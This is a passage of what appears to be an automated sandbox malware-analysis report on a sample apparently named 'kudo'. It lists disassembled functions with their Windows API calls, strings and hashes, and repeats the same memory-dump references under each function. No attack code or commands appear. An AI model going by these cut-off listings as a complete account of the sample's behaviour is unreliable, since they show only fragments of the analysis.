                                                      • __allrem.LIBCMT ref: 00826FB3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00826FD1
                                                      • __allrem.LIBCMT ref: 00826FE8
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00827006
                                                      • __invoke_watson.LIBCMT ref: 00827077
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction ID: cfe2db2517d69aa1237f82bcd127610e5447ee2290bf33b97d6eef37930c4d6b
                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction Fuzzy Hash: 6571E476A00B26ABDB14AE7DEC41B5AB3A8FF44324F14422AF514D7281F770EA9487D1
                                                      Function 00862527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862542
                                                      • GetMenuItemInfoW.USER32(008C5890,000000FF,00000000,00000030), ref: 008625A3
                                                      • SetMenuItemInfoW.USER32(008C5890,00000004,00000000,00000030), ref: 008625D9
                                                      • Sleep.KERNEL32(000001F4), ref: 008625EB
                                                      • GetMenuItemCount.USER32(?), ref: 0086262F
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0086264B
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00862675
                                                      • GetMenuItemID.USER32(?,?), ref: 008626BA
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00862700
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862714
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862735
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: da1c4645b1e10060acdd149c134c764d5bf99970a9c0eed1164977c35d86414f
                                                      • Instruction ID: 5f77916c4306bb96d290a1adb4692ca7c0b16e3ec28088f1cf32cb53b6a552b0
                                                      • Opcode Fuzzy Hash: da1c4645b1e10060acdd149c134c764d5bf99970a9c0eed1164977c35d86414f
                                                      • Instruction Fuzzy Hash: 1F61B2B0900A49AFDF21DFA8DC88DBE7BB9FB01348F1541A9E942E7251D731AD05DB21
                                                      Function 00886F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00886FA5
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00886FA8
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00886FCC
                                                      • _memset.LIBCMT ref: 00886FDD
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00886FEF
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00887067
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: 1aae85d4144ff0caaab470afeee9b85fac275c904ee780e0619bf9830990e211
                                                      • Instruction ID: af0933d381ba72a9638a042d304cd30123acd194253aef2a26cfc5d4965f4ff1
                                                      • Opcode Fuzzy Hash: 1aae85d4144ff0caaab470afeee9b85fac275c904ee780e0619bf9830990e211
                                                      • Instruction Fuzzy Hash: 91615A75900208AFDB11DFA8CC85EEE77B8FB09710F244169FA14EB2A1D771AD45DB90
                                                      Function 00856B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00856BBF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00856C18
                                                      • VariantInit.OLEAUT32(?), ref: 00856C2A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00856C4A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00856C9D
                                                      • SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00856950), ref: 00856CB1
                                                      • VariantClear.OLEAUT32(?), ref: 00856CC6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00856CD3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00856CDC
                                                      • VariantClear.OLEAUT32(?), ref: 00856CEE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00856CF9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 92a8d98c32f66243b0dc7bfcb78b0430f8cc4630672b7a94796ccbd8cfd43e89
                                                      • Instruction ID: 2b04cb8110c6923de0cd8f13b8e394a532634b6bed7f849e9b395470b9e3a055
                                                      • Opcode Fuzzy Hash: 92a8d98c32f66243b0dc7bfcb78b0430f8cc4630672b7a94796ccbd8cfd43e89
                                                      • Instruction Fuzzy Hash: D6415E71A002199FCF00DFA8D8449AEBBB9FF08355F408069ED55E7262DB30AD59CB95
                                                      Function 008783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • CoInitialize.OLE32 ref: 00878403
                                                      • CoUninitialize.OLE32 ref: 0087840E
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00892BEC,?), ref: 0087846E
                                                      • IIDFromString.OLE32(?,?), ref: 008784E1
                                                      • VariantInit.OLEAUT32(?), ref: 0087857B
                                                      • VariantClear.OLEAUT32(?), ref: 008785DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: d0e138cb85606ea5b5eac8de82badd6b464296461759c1d9e05cfadd74793f47
                                                      • Instruction ID: 6f7bdaa70f8f9a952785ec6caf8b76470009e12566240bb4e6f0df814dc5a297
                                                      • Opcode Fuzzy Hash: d0e138cb85606ea5b5eac8de82badd6b464296461759c1d9e05cfadd74793f47
                                                      • Instruction Fuzzy Hash: ED617B70648312DFC710DF28C849A6ABBE8FF49754F048519F989DB292CB70ED48CB96
                                                      Function 00875732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WS2_32(00000101,?), ref: 00875793
                                                      • inet_addr.WS2_32(?), ref: 008757D8
                                                      • gethostbyname.WS2_32(?), ref: 008757E4
                                                      • IcmpCreateFile.IPHLPAPI ref: 008757F2
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00875862
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00875878
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008758ED
                                                      • WSACleanup.WS2_32 ref: 008758F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 6c30265f91edb31ca6572864d89883a4b8f4b3c39b33ce9576f3d1c149e511d3
                                                      • Instruction ID: 23b5532bc70271d9c041daaf96e742a4802de1ce1ccf6c1634f6736f9f2af605
                                                      • Opcode Fuzzy Hash: 6c30265f91edb31ca6572864d89883a4b8f4b3c39b33ce9576f3d1c149e511d3
                                                      • Instruction Fuzzy Hash: 0F516F716046009FDB10AF28DC85B2A7BE4FF48724F148569F99ADB2E5DB70E900DB52
                                                      Function 0086B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B4D0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0086B546
                                                      • GetLastError.KERNEL32 ref: 0086B550
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0086B5BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 22b41b9ec8c5f382368ef429f7b80674028f11ece3e4b6133af04ada6c8f6abe
                                                      • Instruction ID: e41dd9c973ac94c7229e6228edd5bb75be086ec9484acbda04886bd3f80c94bf
                                                      • Opcode Fuzzy Hash: 22b41b9ec8c5f382368ef429f7b80674028f11ece3e4b6133af04ada6c8f6abe
                                                      • Instruction Fuzzy Hash: 48318F35A00209EFCB11EF68CC89AEE7BB4FF09318F114125E616DB292DB709A81CB51
                                                      Function 00858F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00859014
                                                      • GetDlgCtrlID.USER32 ref: 0085901F
                                                      • GetParent.USER32 ref: 0085903B
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0085903E
                                                      • GetDlgCtrlID.USER32(?), ref: 00859047
                                                      • GetParent.USER32(?), ref: 00859063
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00859066
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: a4e9100bbd786478fa287fa25388016c248ed766db52398b0ca158683592e307
                                                      • Instruction ID: e606a06227a374939b7b3a8a89d78725f13c6c417e9d649d290320f7a04063bd
                                                      • Opcode Fuzzy Hash: a4e9100bbd786478fa287fa25388016c248ed766db52398b0ca158683592e307
                                                      • Instruction Fuzzy Hash: 8621A170A00108BBDF15ABA8CC85EFEBB65FF59310F100265FA61972E2EB755819DB21
                                                      Function 0085907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008590FD
                                                      • GetDlgCtrlID.USER32 ref: 00859108
                                                      • GetParent.USER32 ref: 00859124
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00859127
                                                      • GetDlgCtrlID.USER32(?), ref: 00859130
                                                      • GetParent.USER32(?), ref: 0085914C
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0085914F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: 131366abcb4d630e3d45d7553377e6955bc7278cc8ad59c68d19eb2ca7b3ff3d
                                                      • Instruction ID: b704d4391ee5c16b2d55d0f348299b8520abd9122e158bd1d6ed0d8f0dfca833
                                                      • Opcode Fuzzy Hash: 131366abcb4d630e3d45d7553377e6955bc7278cc8ad59c68d19eb2ca7b3ff3d
                                                      • Instruction Fuzzy Hash: 4921C474A00108BBDF11ABA8CC85EFEBB65FF55301F100115FA51D72A2EB795419DB21
                                                      Function 00859163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32 ref: 0085916F
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00859184
                                                      • _wcscmp.LIBCMT ref: 00859196
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00859211
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: 860e1113e6603673840a4c2b644293898a69d13b92cd9859c8af42cb50e514ec
                                                      • Instruction ID: 3ed7c647c962af8c418de9b52b1dfe221d9bc3cfe44614226353583cc7c83ec6
                                                      • Opcode Fuzzy Hash: 860e1113e6603673840a4c2b644293898a69d13b92cd9859c8af42cb50e514ec
                                                      • Instruction Fuzzy Hash: E1112C3A288327F9FA212628EC06DE73B9CFB15721F200026FE20E41D2FF6968556655
                                                      Function 008788AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 008788D7
                                                      • CoInitialize.OLE32(00000000), ref: 00878904
                                                      • CoUninitialize.OLE32 ref: 0087890E
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00878A0E
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00878B3B
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00892C0C), ref: 00878B6F
                                                      • CoGetObject.OLE32(?,00000000,00892C0C,?), ref: 00878B92
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00878BA5
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00878C25
                                                      • VariantClear.OLEAUT32(?), ref: 00878C35
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: 75ff5a60db04185cbdd7589b51d775a52edf46c66852cde8e3c25913e558772e
                                                      • Instruction ID: 88a7e0c925591abad47e7a1147383c0dbc64cb559e3b47d824966f62b7102d88
                                                      • Opcode Fuzzy Hash: 75ff5a60db04185cbdd7589b51d775a52edf46c66852cde8e3c25913e558772e
                                                      • Instruction Fuzzy Hash: CCC103B1604305AFC700DF68C88892AB7E9FF89358F00896DF59ADB251DB71ED05CB52
                                                      Function 00867990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00867A6C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
